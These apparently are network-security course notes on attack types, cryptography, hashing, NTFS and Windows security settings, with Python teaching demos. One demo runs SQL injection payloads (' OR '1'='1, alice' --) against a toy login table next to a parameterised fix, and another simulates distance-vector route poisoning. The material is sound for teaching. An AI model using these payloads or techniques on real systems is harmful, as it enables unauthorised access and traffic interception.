1. Fundamentals of Network Security 
Types of Security 

■ Computer Security - generic name for the collection of tools designed to 
protect data and to thwart hackers 

■ Network Security - measures to protect data during their transmission 

■ Internet Security - measures to protect data during their transmission 
over a collection of interconnected networks 

Terminology 

■ Access control - ability to permit or deny the use 
of an object by a subject. 

■ It provides 3 essential services: 

- Identification and authentication (who can login) 

- Authorization (what authorized users can do) 

- Accountability (identifies what a user did) 


Non-Repudiation 


■ A property of a cryptographic system that 
prevents a sender from denying later that he or 
she sent a message or performed a certain 
action. 

Audit 

A chronological record of system activities that is 
sufficient to enable the reconstruction and 


Vulnerability 

■ A weakness in security procedures, network 
design, or implementation that can be exploited 
to violate a corporate security policy 

- Software bugs 

- Configuration mistakes 

- Network design flaw 

■ Exploit 

- Taking advantage of a vulnerability. 

Risk 

■ The possibility that a particular vulnerability will 
be exploited, together with the harm that would result 

- Risk analysis: the process of identifying the 
security risks, determining their impact, and 
identifying the areas that require protection 

Threat 

■ Any circumstance or event with the potential to 
cause harm to a networked system 

- Denial of service 

Attacks that make computer resources (e.g., bandwidth, disk 
space, or CPU time) unavailable to their intended users 

- Unauthorised access 

Access without permission issued by the rightful owner of 
the devices or networks 

- Impersonation 

- Worms 

- Viruses 


Attack sources 

■ Active vs. Passive 

- Active = Writing data to the network 

It is common to disguise one's address and conceal the identity 
of the traffic sender. 

- Passive = Reading data on the network 

Purpose = breach of confidentiality 

■ Either kind of attack is easiest from an on-path position: 

- Attackers gain control of a host in the communication path 
between two victim machines 

- Attackers compromise the routing infrastructure to 
arrange for the traffic to pass through a compromised machine. 

What are security aims? 

■ Controlling data / network access 

■ Preventing intrusions 

■ Responding to incidents 

■ Ensuring network availability 

■ Protecting information in transit 



Security services 

■ Authentication 

■ Authorisation 

■ Access control 

■ Data integrity 

■ Data confidentiality 
■ Auditing / logging 

■ DoS mitigation 


Attacks 

■ ARP Spoofing 

■ MAC attacks 

■ DHCP attacks 

■ VLAN hopping 

Routing Attacks 

■ Attempt to poison the routing information 

■ Distance Vector Routing 

- Announce 0 distance to all other nodes; neighbours then 
forward traffic for every destination to the attacker, who can: 

Blackhole the traffic (drop it) 

Eavesdrop (read it, then forward it on) 

■ Link State Routing 

- Can drop links randomly 

- Can claim a direct link to any other router 

- A bit harder to attack than DV, because every router 
receives the whole topology and can cross-check a bogus advertisement 

■ BGP attacks 

- ASes can announce an arbitrary prefix (prefix hijacking) 

- ASes can alter the AS path 
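The distance-vector attack above can be watched happening in a few lines. The script below is an added example written for these notes (it is not code from any router or from the original page): it runs a synchronous Bellman-Ford distance-vector exchange over a constructed five-node topology in which node M is the attacker. Node names, link costs and the topology are all made up for the demonstration. With honest advertisements, A reaches D through B and C; once M advertises "distance 0 to everything", its neighbour B prefers M for D, and the forwarding path from A dead-ends at the attacker.

```python
INF = float("inf")

# Constructed topology: routers A, B, C, D in a line, attacker M hanging off B.
# Undirected links with their costs (made up for this example).
LINKS = {("A", "B"): 1, ("B", "C"): 1, ("C", "D"): 1, ("B", "M"): 1}


def neighbours(links):
    """Adjacency map {node: {neighbour: cost}} built from the undirected link list."""
    nbrs = {}
    for (u, v), cost in links.items():
        nbrs.setdefault(u, {})[v] = cost
        nbrs.setdefault(v, {})[u] = cost
    return nbrs


def run_dv(links, liar=None, max_rounds=50):
    """Synchronous distance-vector routing (Bellman-Ford) until no table changes.

    Returns {node: {dest: (cost, next_hop)}}.  If `liar` names a node, that node
    advertises distance 0 to *every* destination, which is the attack in the notes:
    any neighbour for whom 'link cost + 0' beats its honest route switches to it.
    """
    nbrs = neighbours(links)
    nodes = sorted(nbrs)
    table = {u: {d: ((0, u) if d == u else (INF, None)) for d in nodes} for u in nodes}
    for _ in range(max_rounds):
        # Each node advertises its current vector; the liar advertises all zeros.
        adverts = {
            v: ({d: 0 for d in nodes} if v == liar else {d: table[v][d][0] for d in nodes})
            for v in nodes
        }
        changed = False
        for u in nodes:
            for d in nodes:
                if d == u:
                    continue
                best = (INF, None)
                for v in sorted(nbrs[u]):            # deterministic tie-breaking
                    cost = nbrs[u][v] + adverts[v][d]
                    if cost < best[0]:
                        best = (cost, v)
                if best != table[u][d]:
                    table[u][d] = best
                    changed = True
        if not changed:
            break
    return table


def forwarding_path(table, src, dst, blackhole=None, max_hops=10):
    """Follow next hops from src towards dst.  Stops at `blackhole` (the attacker
    drops what it receives) or when a hop has no route, so a hijack shows up as a
    path that never reaches dst."""
    path, node = [src], src
    while node != dst and node != blackhole and len(path) <= max_hops:
        hop = table[node][dst][1]
        if hop is None:
            break
        path.append(hop)
        node = hop
    return path


if __name__ == "__main__":
    honest = run_dv(LINKS)
    poisoned = run_dv(LINKS, liar="M")
    print("honest   A->D:", forwarding_path(honest, "A", "D"))
    print("poisoned A->D:", forwarding_path(poisoned, "A", "D", blackhole="M"))
    print("B's route to D after poisoning:", poisoned["B"]["D"])
```

Note that destinations B is directly connected to (A, C) are not hijacked, because the attacker's "0" cannot beat a one-hop route; the lie only wins where it is strictly cheaper than the honest path. Real DV protocols such as RIP accept exactly this kind of advertisement from any neighbour unless authentication is configured.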


Application Layer Attacks 



■ Scripting vulnerabilities 

■ Cookie poisoning 

■ Buffer overflow 

■ Hidden field manipulation 

■ Parameter tampering 

■ Cross-site scripting 

■ SQL injection 
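Of the application-layer attacks listed, SQL injection is the one most easily shown in working code. The example below is added to these notes (it is not from the original page or from any real application): it builds an in-memory SQLite table with constructed sample users, then implements the same login check twice, once by concatenating user input into the SQL text and once with a parameterised query. The table layout, the user names and the passwords are all invented for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"),
         ("bob", "hunter2", "user"),
         ("carol", "tr0ub4dor", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so user input becomes SQL syntax."""
    sql = (
        "SELECT username, role FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately from the SQL
    text, so quotes, OR and comment markers in the input are only compared as data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Tautology in the password field: ... AND password = '' OR '1'='1'
    print("vulnerable, tautology :", login_vulnerable(db, "alice", "' OR '1'='1"))
    # Comment in the username field: ... WHERE username = 'alice' --' AND password = ...
    print("vulnerable, impersonate:", login_vulnerable(db, "alice' --", "wrong"))
    print("safe, tautology        :", login_safe(db, "alice", "' OR '1'='1"))
    print("safe, impersonate      :", login_safe(db, "alice' --", "wrong"))
    print("safe, real credentials :", login_safe(db, "bob", "hunter2"))
```

The first payload returns every row (the injected OR makes the WHERE clause true for all of them); the second logs in as the admin without a password because `--` comments out the rest of the query. The parameterised version returns nothing for either payload. Storing passwords in clear text, as this toy table does, is itself a defect; see the hashing notes later in this section.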


Common Types of Attack 

■ Man-in-the-middle attack - intercepts messages 
that are intended for a valid device 

■ Ping sweeps and port scans 

■ Hijacking and Spoofing - sets up a fake device 
and tricks others into sending messages to it 

■ Sniffing - captures packets as they travel through 
the network 

■ DoS and DDoS 

Wireless Attacks 

■ WEP - the first security mechanism for 802.11 
wireless networks 

■ Weaknesses in this protocol were discovered by 
Fluhrer, Mantin and Shamir, whose attacks 
became known as "FMS attacks" 

■ Tools were developed to automate WEP 
cracking 

■ Chopping ("chopchop") attacks were later released to crack WEP 
more effectively and faster 

Man in the Middle Attacks (Wireless) 

■ Creates a fake access point and has clients 
authenticate to it instead of the legitimate one. 

■ Captures traffic to see usernames, passwords, 
etc. that are sent in clear text. 


What is Cryptography? 

■ Part of a field of study known as cryptology 

■ Cryptology includes: 

- Cryptography 

Study of methods for secret writing 
Transforming messages into unintelligible form 
Recovering messages using some secret knowledge (key) 

- Cryptanalysis 

Analysis of cryptographic systems, inputs and outputs 
To derive confidential information 

Cryptography 

■ Encryption - process of transforming plaintext to 
ciphertext using a cryptographic key 

■ Symmetric key cryptography - uses a single key 
to both encrypt and decrypt information. Also 
known as secret-key (or private-key) cryptography. 

- Includes DES, 3DES, AES, IDEA, RC5, Blowfish 

■ Asymmetric key cryptography - separate keys 
for encryption and decryption (a public key and a 
private key). Also known as public-key cryptography. 

Terminology of cryptography 

■ Cipher 

- Cryptographic technique (algorithm) applying a secret transformation to 
messages 

■ Plaintext / cleartext 

- Original message or data 


■ Encryption 

- Transforming plaintext, using a secret key, so meaning is concealed 

■ Ciphertext 

- Unintelligible encrypted plaintext 

■ Decryption 

- Transforming ciphertext back into original plaintext 

■ Cryptographic Key 

- Secret knowledge used by cipher to encrypt or decrypt message 

Cryptography 

■ Digital Signature - the sender signs a digest of the message 
with their own private key (rather than encrypting with the 
intended receiver's public key); anyone holding the sender's 
public key can verify the signature 

■ Message digests - a hash function produces a condensed, 
fixed-length representation of a message (hashing) 

- MD5 (128-bit output; collisions can now be produced at will) 

- SHA-1 (160-bit output; deprecated for the same reason) 

- HMAC (a keyed MAC built from a hash; gives integrity plus 
authenticity, unlike a bare digest) 

DES 

■ Data Encryption Standard 


■ Developed by IBM for the US government in 
1973-1974, and approved in Nov 1976. 

■ Based on Horst Feistel’s Lucifer cipher 

■ Block cipher using shared key encryption, 56-bit 
key length (short enough to brute-force with modern 
hardware, which is why 3DES and later AES replaced it) 

■ Block size: 64 bits 


Secret Key Encryption 

(Figure: sensitive information (cleartext) -> ENCRYPT with the shared secret key -> ciphertext 
sent across the INTERNET -> DECRYPT with the same shared secret key -> sensitive information (cleartext).) 

Hashing 

■ Also called a digest or checksum 

■ A fixed-length fingerprint that represents the data 

■ Uses: 

- Verifying file integrity - if the hash changes, the 
data has been corrupted or altered in transit 

- Digitally signing documents (the signature is computed 
over the digest rather than the whole message) 

- Hashing passwords (with a salt and a slow, iterated 
function, so that a stolen table of hashes is expensive to crack) 


■ MD5 (Message Digest Algorithm) 

- Outputs a 128-bit fingerprint of an arbitrary-length 
input; collision attacks are practical, so it must not be 
used where collision resistance matters 

■ SHA-1 (Secure Hash Algorithm) 

- Outputs a 160-bit message digest, similar in design to MD5 

- Was widely used in security applications (TLS, SSL, 
PGP, SSH, S/MIME, IPsec); now deprecated in favour of the SHA-2 family 
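The three uses of hashing listed above (integrity checks, message authentication, password storage), and the digest/HMAC distinction made under "Message digests" earlier in this section, can all be exercised with the Python standard library. The block below is an added example for these notes, not code from the original page; the sample message, the key and the password are constructed for the demonstration. It uses SHA-256 rather than MD5 or SHA-1 for the reasons given above, HMAC-SHA256 for the keyed tag, and PBKDF2-HMAC-SHA256 (salted and iterated) for the password record.

```python
import hashlib
import hmac
import os


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Fixed-length fingerprint of arbitrary-length data.  hashlib also offers
    md5 and sha1, which is handy for checking legacy checksums but not for new use."""
    return hashlib.new(algorithm, data).hexdigest()


def integrity_ok(data: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """File-integrity check: recompute the digest and compare in constant time."""
    return hmac.compare_digest(digest_hex(data, algorithm), expected_hex)


def mac_tag(key: bytes, message: bytes) -> str:
    """HMAC: a keyed hash.  An attacker who changes the message cannot produce a
    matching tag without the key, which a bare digest does not guarantee."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def mac_ok(key: bytes, message: bytes, tag_hex: str) -> bool:
    return hmac.compare_digest(mac_tag(key, message), tag_hex)


def hash_password(password: str, salt=None, iterations: int = 200_000) -> str:
    """Salted, iterated password hash (PBKDF2-HMAC-SHA256).  The record carries its
    own parameters as 'iterations$salt$hash' so they can be raised over time."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    msg = b"transfer 100 to account 42"        # constructed sample message
    tampered = b"transfer 900 to account 42"   # one digit changed
    print("digest original:", digest_hex(msg)[:16], "... tampered:", digest_hex(tampered)[:16], "...")
    key = b"shared-secret-key"                  # constructed; in practice a random key
    tag = mac_tag(key, msg)
    print("tag verifies on original:", mac_ok(key, msg, tag))
    print("tag verifies on tampered:", mac_ok(key, tampered, tag))
    record = hash_password("correct horse battery staple")
    print("stored record:", record[:40], "...")
    print("password verifies:", verify_password("correct horse battery staple", record))
```

Two details matter in practice: `hmac.compare_digest` avoids the timing leak that `==` on hex strings would introduce, and a digest alone (the first function) proves nothing about who produced the data, because anyone can recompute it; that is the gap HMAC and digital signatures close.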


2. Ethical Hacking VS Non Ethical Hacking 
What is ethical hacking ? 

As the name suggests, something legal is associated with it. Today many organizations have their computers 
hacked for the good of the organization: hacking a computer, in this sense, means finding its vulnerabilities, 
that is the loopholes in it, and then building a firewall or other defence against them. Consider a very simple 
example: an organization upgrades its Windows security on a daily basis. It is also usual to hack new software 
prior to its release, to test its ability to withstand such attacks. 


What is non ethical hacking ? 

This is a serious issue and also the hottest topic among today's youth, because almost every user is facing this kind of 
problem. It means that people steal someone's data just for their own personal gain. It mostly includes credit 
card information and ID theft, and that makes perfect sense to me. However, hacking primarily to do damage to 
someone or something is foreign to me. I do not and will not ever understand how someone can get personal satisfaction 
from watching others suffer. While I feel this way, I will also say that unethical hacking is far more interesting for me to 
read about. Among these, the malicious hacker is to be considered, which is the black hat hacker. 


3 Types of Hacker 

1. Black Hat Hacker ( Real Hacker ) 

2. White Hat Hacker ( Ethical Hacker ) 

3. Gray Hat Hacker 


3. Type of Security Threats 


Introduction 

Computer technology is more and more ubiquitous; the penetration of computers into society is a welcome step towards 
modernization, but society needs to be better equipped to grapple with the challenges associated with technology. New hacking 
techniques are used to penetrate networks, and security vulnerabilities that are not discovered promptly make it 
difficult for security professionals to catch hackers. The difficulty of staying up to date with security issues 
within the realm of IT education is due to the lack of current information. Recent research is focused on bringing 
quality security training together with rapidly changing technology. A course in online networking security aims to provide a solid 
understanding of the main issues related to security in modern networked computer systems. This covers the underlying 
concepts and foundations of computer security, basic knowledge about security-relevant decisions in designing IT 
infrastructures, techniques to secure complex systems and practical skills in managing a range of systems, from a personal 
laptop to large-scale infrastructures. 


Definition 

According to the UK Government, Information security is: "the practice of ensuring information is only read, heard, 
changed, broadcast and otherwise used by people who have the right to do so" 

Why is Computer Security Necessary? 

Computer security is the process of preventing and detecting unauthorized use of your computer. Prevention measures help 
you to stop unauthorized users from accessing any part of your computer system. Detection helps you to determine whether 
or not someone attempted to break into your system, if they were successful, and what they may have done. 

Virus Threats 

A computer virus is a program written to alter the way a computer operates, without the permission or knowledge of 
the user. A virus replicates and executes itself, usually doing damage to your computer in the process. 

Spyware Threats 


A serious computer security threat, spyware is any program that monitors your online activities or installs programs without 
your consent, for profit or to capture personal information. 



Hackers 


People, not computers, create computer security threats and malware. Hackers, in the sense used here, are programmers who 
victimize others for their own gain by breaking into computer systems to steal, change or destroy information, sometimes 
as a form of cyber-terrorism. 


Phishing Threats 

Masquerading as a trustworthy person or business, phishers attempt to steal sensitive financial or personal information 
through fraudulent email or instant messages. 

Internet Based Attacks 

While your computer is connected to the Internet it can be subject to attack through your network communications. 
Some of the most common attacks include the following (all three date from the late 1990s and have long since been 
patched; they illustrate the category rather than current threats): 

□ Bonk - An attack on the Microsoft TCP/IP stack that can crash the attacked computer. 

□ RDS_Shell - A method of exploiting the Remote Data Services component of the Microsoft Data Access Components 
that lets a remote attacker run commands with system privileges. 

□ WinNuke - An exploit that can use NetBIOS to crash older Windows computers. 

Viral Web Sites 

Users can be enticed, often by email messages, to visit web sites that contain viruses or Trojans. These sites are known as 
viral web sites and are often made to look like well known web sites and can have similar web addresses to the sites they 
are imitating. Users who visit these sites often inadvertently download and run a virus or Trojan and can then become 
infected or the subject of hacker attacks. 


Spyware, Adware and Advertising Trojans 



Spyware, Adware and Advertising Trojans are often installed with other programs, usually without your knowledge. They 
record your behaviors on the Internet, display targeted ads to you and can even download other malicious software on to 
your computer. They are often included within programs that you can download free from the 


Internet or that are on CDs given away free by magazines. Spyware doesn’t usually carry viruses but it can use your system 
resources and slow down your Internet connection with the display of ads. If the Spyware contains bugs (faults) it can make 
your computer unstable, but the main concern is your privacy. These programs record every step that you take on the Internet 
and forward it to an Ad Management Centre which reviews your searches and downloads to determine your shopping 
preferences. The Ad Management Centre will build up a detailed profile of you, without your knowledge, and can pass this 
on to third parties, again without your knowledge. Some Spyware can download more serious threats on to your computer, 
such as Trojan Horses. 


Social Engineering 

Tricking computer users into revealing computer security or private information, e.g. passwords, email addresses, etc, by 
exploiting the natural tendency of a person to trust and/or by exploiting a person's emotional response. 

How to Secure the System 

There are three basic methods to secure the system from online security attack. 

□ Prevention: If you were to secure your house, prevention would be similar to placing dead bolt locks on your doors, 
locking your window, and perhaps installing a chain link fence around your yard. You are doing everything possible to 
keep the threat out. 



□ Detection: You want to be sure you detect when such failures happen. Once again using the house analogy, this would 
be si mi lar to putting a burglar alarm and motion sensors in the house. These alarms go off when someone breaks in. If 
prevention fails, you want to be alerted to that as soon as possible. 


□ Reaction: Detecting the failure has little value if you do not have the ability to respond. What good does it do to be alerted 
to a burglar if nothing is done? If someone breaks into your house and triggers the burglar alarm, one hopes that the local 
police force can quickly respond. The same holds true for information security. Once you have detected a failure, you must 
execute an effective response to the incident. 


Tips for securing the system against attack 

□ Install and Use Anti-Virus Programs 

□ Use Care When Reading Email with Attachments 

□ Install and Use a Firewall Program 

□ Make Backups of Important Files and Folders 

□ Use Strong Passwords 

□ Use Care When Downloading and Installing Programs 

□ Install and Use a Hardware Firewall 

□ Install and Use a File Encryption Program and Access Controls 

□ Safeguard your Data 

□ Real-World Warnings keep you safe online. 

□ Keeping Children Safe Online 


Privacy Control 



□ Protecting Your Privacy 

□ Effectively Erasing Files 

□ Supplementing Passwords 


Use Safe Browsing 

□ Evaluating Your Web Browser's Security Settings 

□ Shopping Safely Online 

□ Web Site Certificates 

□ Bluetooth Technology 

□ Reviewing End-User License Agreements 


4. Windows Operating System 


History 

The story of Windows begins with a very different operating system, developed by Microsoft for the first IBM 
personal computer and referred to as MS-DOS or PC-DOS. The initial version, DOS 1.0, was released in 
August 1981. It consisted of 4000 lines of assembly language source code and ran in 8 Kbytes of memory using 
the Intel 8086 microprocessor.When IBM developed a hard disk-based personal computer, the PC XT, Microsoft 
developed DOS 2.0, released in 1983. It contained support for the hard disk and provided for hierarchical 
directories. Heretofore, a disk could contain only one directory of files, supporting a maximum of 64 files. While 
this was adequate in the era of floppy disks, it was too limited for a hard disk, and the single-directory restriction 
was too clumsy. This new release allowed directories to contain subdirectories as well as files. The new release 



also contained a richer set of commands embedded in the operating system to provide functions that had to be 
performed by external programs provided as utilities with release 1. Among the capabilities added were several 
UNIX-like features, such as I/O redirection, which is the ability to change the input or output 
identity for a given application, and background printing. The memory-resident portion grew to 24 Kbytes. When 
IBM announced the PC AT in 1984, Microsoft introduced DOS 3.0. The AT contained the Intel 80286 


processor, which provided extended addressing and memory protection features. These were not used by DOS. 
To remain compatible with previous releases, the operating system simply used the 80286 as a "fast 8086." The 
operating system did provide support for new keyboard and hard disk peripherals. Even so, the memory 
requirement grew to 36 Kbytes. There were several notable upgrades to the 3.0 release. DOS 3.1, released in 
1984, contained support for networking of PCs. The size of the resident portion did not change; this was 
achieved by increasing the amount of the operating system that could be swapped. DOS 3.3, released in 1987, 
provided support for the new line of IBM machines, the PS/2. Again, this release did not take advantage of the 
processor capabilities of the PS/2, provided by the 80286 and the 32-bit 80386 chips.The resident portion 
at this stage had grown to a minimum of 46 Kbytes, with more required if certain optional extensions were 
selected. By this time, DOS was being used in an environment far beyond its capabilities. The introduction of the 
80486 and then the Intel Pentium chip provided power and features that simply could not be exploited by the 
simple-minded DOS. Meanwhile, beginning in the early 1980s, Microsoft began development of a graphical user 
interface (GUI) that would be interposed between the user and DOS. Microsoft's intent was to compete with 
Macintosh, whose operating system was unsurpassed for ease of use. By 1990, Microsoft had a version of the 
GUI, known as Windows 3.0, which incorporated some of the user friendly features of Macintosh. However, it 
was still hamstrung by the need to run on top of DOS. 

After an abortive attempt by Microsoft to develop with IBM a next-generation operating 
system, which would exploit the power of the new microprocessors and which would incorporate the ease-of-use 
features of Windows, Microsoft struck out on its own and developed a new operating system from the 
ground up, Windows NT. Windows NT exploits the capabilities of contemporary microprocessors and provides 
multitasking in a single-user or multiple-user environment. 

The first version of Windows NT (3.1) was released in 1993, with the same GUI as Windows 3.1, 
another Microsoft operating system (the follow-on to Windows 3.0). However, NT 3.1 was a new 32-bit operating 
system with the ability to support older DOS and Windows applications as well as provide OS/2 support. After 
several versions of NT 3.x, Microsoft released NT 4.0. NT 4.0 has essentially the 
same internal architecture as 3.x. The most notable external change is that NT 4.0 provides the same 
user interface as Windows 95. The major architectural change is that several graphics components that ran in 
user mode as part of the Win32 subsystem in 3.x have been moved into 
the Windows NT Executive, which runs in kernel mode. The benefit of this change is to speed up the operation 
of these important functions. The potential drawback is that these graphics functions now have access to low- 
level system services, which could impact the reliability of the operating system. In 2000, Microsoft introduced 
the next major upgrade, now called Windows 2000. Again, the underlying Executive and kernel architecture is 
fundamentally the same as in NT 4.0, but new features have been added. The emphasis in Windows 2000 is the 
addition of services and functions to support distributed processing. The central element of Windows 2000's new 
features is Active Directory, which is a distributed directory service able to map names of arbitrary objects to any 
kind of information about those objects. 

One final general point to make about Windows 2000 is the distinction between Windows 2000 Server and 
Windows 2000 desktop. In essence, the kernel and executive architecture and services remain the same, but 
Server includes some services required to use as a network server. In 2001, the latest desktop version of 
Windows was released, known as Windows XP. Both home PC and business workstation versions of XP are 
offered. Also in 2001, a 64-bit version of XP was introduced. In 2003, Microsoft introduced a new server version, 
known as Windows Server 2003; both 32-bit and 64 bit versions are available. The 64-bit versions of XP and 
Server 2003 are designed specifically for the 64-bit Intel Itanium hardware. 


NTFS Volume and File Structure 

NTFS makes use of the following disk storage concepts: 



• Sector: The smallest physical storage unit on the disk. The data size in bytes is a power of 2 and is almost 
always 512 bytes. 


• Cluster: One or more contiguous (next to each other on the same track) sectors. The cluster size in sectors 
is a power of 2. 

• Volume: A logical partition on a disk, consisting of one or more clusters and used by a filesystem to allocate 
space. At any time, a volume consists of file system information, a collection of files, and any additional 
unallocated space remaining on the volume that can be allocated to files. A volume can be all or a portion of a 
single disk or it can extend across multiple disks. If hardware or software RAID 5 is employed, a volume 
consists of stripes spanning multiple disks. The maximum volume size for NTFS is 2^64 bytes. 

The cluster is the fundamental unit of allocation in NTFS, which does not recognize 
sectors. For example, suppose each sector is 512 bytes and the system is configured with two sectors per 
cluster (one cluster = 1 Kbyte). If a user creates a file of 1600 bytes, two clusters are allocated to the file. Later, 
if the user updates the file to 3200 bytes, another two clusters are allocated. The clusters allocated to a file need 
not be contiguous; it is permissible to fragment a file on the disk. Currently, the maximum file size supported by 
NTFS is 2^32 clusters, which is equivalent to a maximum of 2^48 bytes. A cluster can have at most 2^16 bytes. 

The use of clusters for allocation makes NTFS independent of physical sector size. This enables NTFS to 
support easily nonstandard disks that do not have a 512-byte sector size and to support efficiently very large 
disks and very large files by using a larger cluster size. The efficiency comes from the fact that the file system 
must keep track of each cluster allocated to each file; with larger clusters, there are fewer items to manage. 


Windows NTFS Partition and Cluster Sizes 

Volume Size            Sectors per Cluster    Cluster Size 
up to 512 Mbyte        1                      512 bytes 
512 Mbyte - 1 Gbyte    2                      1K 
1 Gbyte - 2 Gbyte      4                      2K 
2 Gbyte - 4 Gbyte      8                      4K 
4 Gbyte - 8 Gbyte      16                     8K 
8 Gbyte - 16 Gbyte     32                     16K 
16 Gbyte - 32 Gbyte    64                     32K 
> 32 Gbyte             128                    64K 
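The allocation rule in the paragraph above (whole clusters, rounded up) and the default-size table can be turned into a small calculator, which also exposes the forensic consequence the notes do not mention: the bytes between the end of a file and the end of its last cluster ("slack space") are not handed to any other file, so whatever was there before stays on disk. The code below is an added example written for these notes, not code from the original page or from Windows; the table it encodes is the one tabulated above (which reflects older NT versions, whereas current Windows releases default to 4 KB clusters for almost every volume size), and the 2^32-cluster per-file limit is the figure quoted in the notes.

```python
import bisect

MIB = 2 ** 20
GIB = 2 ** 30
SECTOR = 512                     # assumed sector size, as in the notes' example
MAX_CLUSTERS_PER_FILE = 2 ** 32  # per the notes: 2^32 clusters, 2^48 bytes

# Default cluster sizes as tabulated in these notes: (upper bound of the volume-size
# band, inclusive, cluster size in bytes).  Volumes above the last bound get 64K.
_BANDS = [
    (512 * MIB, 512), (1 * GIB, 1024), (2 * GIB, 2048), (4 * GIB, 4096),
    (8 * GIB, 8192), (16 * GIB, 16384), (32 * GIB, 32768),
]
_LARGEST = 65536


def default_cluster_size(volume_bytes: int) -> int:
    """Cluster size (bytes) the table assigns to a volume of the given size."""
    i = bisect.bisect_left([upper for upper, _ in _BANDS], volume_bytes)
    return _BANDS[i][1] if i < len(_BANDS) else _LARGEST


def clusters_for(file_bytes: int, cluster_bytes: int) -> int:
    """Whole clusters allocated to a file (rounded up; an empty file takes none)."""
    if cluster_bytes % SECTOR or cluster_bytes & (cluster_bytes - 1):
        raise ValueError("cluster size must be a power-of-two multiple of the sector size")
    return -(-file_bytes // cluster_bytes)


def slack_bytes(file_bytes: int, cluster_bytes: int) -> int:
    """Bytes in the final cluster beyond the file's logical end.  They belong to this
    file's allocation, so the file system never reuses them for another file: old data
    can survive there, and data can be hidden there deliberately."""
    return clusters_for(file_bytes, cluster_bytes) * cluster_bytes - file_bytes


def allocation_report(file_bytes: int, volume_bytes: int) -> dict:
    """Combine the two: pick the default cluster size for the volume, then allocate."""
    cluster = default_cluster_size(volume_bytes)
    n = clusters_for(file_bytes, cluster)
    if n > MAX_CLUSTERS_PER_FILE:
        raise ValueError("file exceeds the NTFS per-file cluster limit")
    return {"cluster_bytes": cluster, "clusters": n,
            "allocated_bytes": n * cluster, "slack_bytes": n * cluster - file_bytes}


if __name__ == "__main__":
    # The notes' own example: 1 K clusters, a 1600-byte file grown to 3200 bytes.
    for size in (1600, 3200):
        print(f"{size} bytes -> {clusters_for(size, 1024)} clusters, "
              f"{slack_bytes(size, 1024)} bytes of slack")
    print(allocation_report(1600, 600 * MIB))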


NTFS Volume Layout 


NTFS uses a remarkably simple but powerful approach to organizing information on a disk volume. Every 
element on a volume is a file, and every file consists of a collection of attributes. Even the data contents of a file 
are treated as an attribute. With this simple structure, a few general-purpose functions suffice to organize and 
manage a file system. The first few sectors on any volume are occupied by the partition boot sector (although it is 
called a sector, it can be up to 16 sectors long), which contains information about the volume layout and the file 
system structures as well as boot startup information and code. This is followed by the master file table (MFT), 
which contains information about all of the files and folders (directories) on this NTFS volume as well as 
information about available unallocated space. In essence, the MFT is a list of all contents on this NTFS volume, 
organized as a set of rows in a relational database structure. Following the MFT is a region, typically about 1 
Mbyte in length, containing system files. Among the files in this region are the following: 

• MFT2: A mirror of the first three rows of the MFT, used to guarantee access to the MFT in 
the case of a single-sector failure 

• Log file: A list of transaction steps used for NTFS recoverability 



• Cluster bit map: A representation of the volume, showing which clusters are in use 


• Attribute definition table: Defines the attribute types supported on this volume and 

indicates whether they can be indexed and whether they can be recovered during a system recovery operation. 

Master File Table 

The heart of the Windows file system is the MFT. The MFT is organized as a table of 
variable-length rows, called records. Each row describes a file or a folder on this volume, 


5. Windows Security 


History of Windows Versions 

(Figure: Microsoft Windows family tree, 1985 to 2010. DOS-based line: Windows 1.0, 2.0, 2.1x, 3.0, 3.1x, 
then 95, 98, 98SE and ME. NT kernel-based line, with Professional and Server editions, followed by the 
server-only releases Server 2003, 2003 R2, 2008 and 2008 R2, each offered in Standard, Enterprise and 
Datacenter editions.) 


Control Panel 


The control panel is where system changes and configurations can be made for the Windows operating system. 

Click Start -> Control Panel 


(Screenshot: Control Panel "Pick a category" view, listing Appearance and Themes; Printers and Other 
Hardware; Network and Internet Connections; User Accounts; Add or Remove Programs; Date, Time, 
Language, and Regional Options; Sounds, Speech, and Audio Devices; Accessibility Options; 
Performance and Maintenance; Security Center.) 


Security Center 

Windows Security Center can help enhance your computer's security by checking the status of several security essentials 
on your computer, including firewall settings, Windows automatic updating, anti-malware software settings, Internet 
security settings, and User Account Control settings. 


Click Start -> Control Panel -> Security Center 

Security essentials 

Security Center helps you manage your Windows security settings. To help protect your computer, 
make sure the three security essentials are marked ON. If the settings are not ON, follow the 
recommendations. To return to the Security Center later, open Control Panel. 

(Screenshot: Security Center status panel showing Firewall: ON; Automatic Updates: CHECK SETTINGS; 
Virus Protection: NOT FOUND. Below it, "Manage security settings for:" Internet Options, 
Windows Firewall, Automatic Updates.) 


Local Firewall - General Tab 


.Firewalls are designed to prevent unauthorized access to a system. They can be implemented via hardware or software. 
.A firewall is essential to security and should always be turned 'On' (the General tab). Ticking "Don't allow exceptions" 
blocks all unsolicited inbound traffic; programs that genuinely need to accept connections are listed under the 'Exceptions' tab 

.Click Start -> Control Panel -> Security Center -> Windows Firewall 




Local Firewall - Exceptions Tab 

.The Exceptions tab lists the programs and ports allowed to receive unsolicited inbound connections 

.Adding a program or port here allows unsolicited requests from the network to connect to that program on your computer, 
so keep the list as short as possible 

.Use "Change scope" to be more specific about where the request is allowed to originate from (e.g., only your local subnet) 

.Select "Display a notification when Windows Firewall blocks a program" to be notified 


Automatic Updates 

. Set Automatic Updates to 'Automatic' so that patches are downloaded and installed without waiting for the user. Only where 
